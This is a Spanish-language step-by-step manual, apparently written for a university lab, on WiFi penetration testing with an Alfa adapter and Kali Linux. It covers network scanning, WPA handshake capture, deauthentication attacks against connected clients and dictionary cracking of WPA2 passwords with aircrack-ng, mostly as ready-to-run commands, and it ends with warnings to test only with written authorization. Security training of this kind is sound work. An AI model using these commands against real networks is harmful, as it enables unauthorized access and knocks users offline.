============================================= MANUAL PENTESTING WiFi - ALPHA AWUS036ACH ============================================= Chipset: RTL8812AU | Dual-band 2.4/5GHz Para laboratorio universitario con Live Boot USB Kali Linux CONTENIDO: PARTE 1: Instalar driver en Windows PARTE 2: Crear USB bootable de Kali Linux PARTE 3: Arrancar Kali desde USB PARTE 4: Activar modo monitor PARTE 5: Escanear redes WiFi PARTE 6: Capturar handshake de una red PARTE 7: Ataque de deauth (forzar handshake) PARTE 8: Crackear la contraseña PARTE 9: Persistencia del USB PARTE 10: Resumen de comandos rapidos PARTE 11: Tips laboratorio universitario ============================================= PARTE 1: INSTALAR DRIVER EN WINDOWS ============================================= Paso 1: Descargar driver Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/ Descarga el driver Windows (RTL8812AU). Paso 2: Instalar 1. Desconecta la antena 2. Ejecuta el instalador como administrador 3. Reinicia el PC 4. Conecta la antena despues de reiniciar Paso 3: Verificar Abre PowerShell y ejecuta: Get-NetAdapter Deberias ver "Realtek 8812AU" con estado "Up". En Windows solo puedes escanear redes con Acrylic WiFi Free. Para pentesting REAL necesitas Kali Linux (Parte 2). ============================================= PARTE 2: CREAR USB BOOTABLE DE KALI LINUX ============================================= Paso 1: Descargar Kali Ve a https://www.kali.org/get-kali/ Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB) Paso 2: Grabar ISO en USB con Rufus Necesitas: USB de 16GB minimo + Rufus 1. Descarga Rufus desde https://rufus.ie/ 2. Inserta el USB 3. Abre Rufus 4. Device = tu USB 5. Boot selection = selecciona el ISO de Kali 6. Partition scheme = MBR 7. Target system = BIOS o UEFI 8. Persistent storage -> mueve la barra a 8-12 GB >>> ESTO ES LO QUE CREA LA PARTICION PERSISTENTE <<< Si no la mueves, TODO se pierde al apagar 9. Haz clic en START 10. Selecciona "Write in DD mode" cuando pregunte 11. Espera a que termine (~10-15 min) ============================================= PARTE 3: ARRANCAR KALI DESDE USB ============================================= Paso 1: Configurar BIOS para arrancar desde USB 1. Reinicia el PC 2. Pulsa F2, F12 o DEL al encender (depende del PC) 3. En BIOS ve a "Boot" o "Boot Order" 4. Pon "USB-HDD" o "Removable Device" como primera opcion 5. Guarda y sal (F10 normalmente) Paso 2: Arrancar Kali 1. En el menu de GRUB selecciona "Live system (amd64)" 2. Usuario: kali / Contrasena: kali Paso 3: Conectar la antena Alpha 1. Conecta la Alpha por USB DESPUES de arrancar Kali 2. Abre terminal y verifica: lsusb Debe aparecer: Realtek Semiconductor Corp. RTL8812AU 3. Verifica la interfaz de red: iwconfig Debe aparecer: wlan0 o wlan1 Si NO aparece wlan0, instala el driver: sudo apt update sudo apt install -y realtek-rtl88xxau-dkms sudo reboot ============================================= PARTE 4: ACTIVAR MODO MONITOR ============================================= El modo monitor permite escuchar TODO el tráfico WiFi sin estar conectado a ninguna red. Es la base del pentesting. # 1. Matar procesos que interfieran sudo airmon-ng check kill # 2. Activar modo monitor sudo airmon-ng start wlan0 # 3. Verificar que esta en modo monitor iwconfig wlan0mon # Debe decir: "Mode: Monitor" Si en vez de wlan0mon aparece wlan0 en modo monitor, usa wlan0 en todos los comandos siguientes. SALIR del modo monitor cuando termines: sudo airmon-ng stop wlan0mon ============================================= PARTE 5: ESCANEAR REDES WiFi ============================================= Este es el paso mas importante. Aqui ves TODAS las redes a tu alrededor. sudo airodump-ng wlan0mon Veras una tabla con estas columnas: BSSID = MAC del punto de acceso (router) PWR = Potencia de señal (-30=excelente, -90=malo) Beacons = Paquetes beacon recibidos #Data = Paquetes de datos capturados CH = Canal (1-13 en 2.4GHz, 36-165 en 5GHz) ENC = Cifrado (WPA2, WPA3, OPN=abierto) ESSID = Nombre de la red WiFi PARA PARAR: pulsa Ctrl+C CONSEJOS para elegir red objetivo: - PWR entre -30 y -60 = buena señal (lo ideal) - #Data alto = hay trafico (clientes activos) - ENC = WPA2 (es el mas comun, se puede crackear) - Evita OPN (abierto) y WPA3 (dificil) ============================================= PARTE 6: CAPTURAR HANDSHAKE DE UNA RED ============================================= Una vez que has elegido tu red objetivo (por ejemplo "CampusLab" en canal 6 con BSSID AA:BB:CC:DD:EE:FF), abre UNA NUEVA terminal (no cierres la de escaneo) y ejecuta: sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon REEMPLAZA: - "6" por el canal de tu red objetivo - "AA:BB:CC:DD:EE:FF" por el BSSID de tu red - "captura" es el nombre del archivo donde guardara datos Este comando: 1. Escucha SOLO esa red en su canal 2. Guarda todo en archivos: captura-01.cap, captura-01.csv 3. Espera a que aparezca un "WPA handshake" El WPA handshake aparece arriba a la derecha: WPA handshake: AA:BB:CC:DD:EE:FF ESTO ES LO QUE NECESITAS para crackear la contrasena. Si no aparece el handshake, necesitas un cliente conectandose. Sigue en la Parte 7 para forzarlo. ============================================= PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE) ============================================= Si el handshake no aparece solo, puedes FORZAR a un cliente a reconectarse. Esto le desconecta momentaneamente y al reconectarse se captura el handshake. ABRE UNA TERCERA terminal y ejecuta: sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon REEMPLAZA: - "5" = numero de paquetes de deauth (5-10 suele bastar) - "AA:BB:CC:DD:EE:FF" = BSSID del router (igual que antes) - "XX:XX:XX:XX:XX:XX" = MAC del cliente conectado Para ver clientes conectados a tu red, mira la terminal de la Parte 6. Bajo la columna "STATION" veras las MAC de los clientes conectados. Si no sabes la MAC del cliente, puedes omitir -c: sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon Esto envia deauth a TODOS los clientes de esa red. VERIFICA que aparezca "WPA handshake" en la terminal de la Parte 6 despues del ataque. ============================================= PARTE 8: CRACKEAR LA CONTRASEÑA ============================================= Una vez tengas el WPA handshake capturado: Paso 1: Descomprimir el diccionario sudo gunzip /usr/share/wordlists/rockyou.txt.gz Paso 2: Ejecutar aircrack-ng aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap Sustituye "captura-01.cap" por el nombre de tu archivo. Esto prueba TODAS las contrasenas del diccionario contra el handshake capturado. Velocidad: ~1000-5000 claves/segundo. Si la contrasena esta en el diccionario veras: KEY FOUND! [ la_contrasena ] Si no esta en el diccionario: - Prueba con otro diccionario mas grande - O usa fuerza bruta (mucho mas lento): aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap ============================================= PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS) ============================================= Si usas Kali Live, al reiniciar TODO se pierde a menos que tengas persistencia. Opcion A - Rufus Persistent Partition (ya lo hiciste en Parte 2) Si activaste "Persistent storage" en Rufus, los archivos en /home/kali se guardan automaticamente entre reinicios. Opcion B - Montar particion persistente manualmente: sudo mkdir -p /mnt/persistence sudo mount /dev/sdb3 /mnt/persistence cp captura-01.cap /mnt/persistence/ echo "RED: CampusLab | PASS: la_contrasena" > /mnt/persistence/wifi_cracked.txt sudo umount /mnt/persistence Opcion C - Segundo USB o red: cp captura-01.cap /media/kali/MI_USB/ # O subir a un servidor: scp captura-01.cap user@ip_servidor:/ruta/ ============================================= PARTE 10: RESUMEN DE COMANDOS RAPIDOS ============================================= Ver antena: lsusb && iwconfig Matar interferencias: sudo airmon-ng check kill Activar monitor: sudo airmon-ng start wlan0 Escanear redes: sudo airodump-ng wlan0mon Capturar 1 red: sudo airodump-ng -c CH --bssid MAC -w file wlan0mon Deauth 1 cliente: sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon Crackear: aircrack-ng -w rockyou.txt file.cap Salir monitor: sudo airmon-ng stop wlan0mon ============================================= PARTE 11: TIPS PARA EL LABORATORIO UNIVERSITARIO ============================================= 1. Empieza solo con escaneo pasivo (airodump-ng) - aprende a leer las redes antes de hacer nada activo. 2. Documenta que redes hay, en que canales, que cifrado usan. 3. Solo testea redes que tengas autorizacion explicita - pide al profesor/encargado por escrito. 4. Practica primero con tu propio router si puedes. 5. El rockyou.txt viene en Kali en /usr/share/wordlists/ (descomprimir con sudo gunzip). 6. No hagas deauth en redes publicas reales - es ilegal sin autorizacion. 7. Si la senal es mala (PWR < -70), acercate al router o usa la antena con el reflector parabolico. ============================================= LEER ESTE MANUAL DESDE KALI LIVE ============================================= Si copiaste este archivo al USB de Kali, puedes leerlo desde la terminal con: sudo mount /dev/sdb1 /mnt cat /mnt/MANUAL_PENTEST.txt O para verlo pagina por pagina: cat /mnt/MANUAL_PENTEST.txt | less Para copiarlo al escritorio de Kali: cp /mnt/MANUAL_PENTEST.txt ~/Desktop/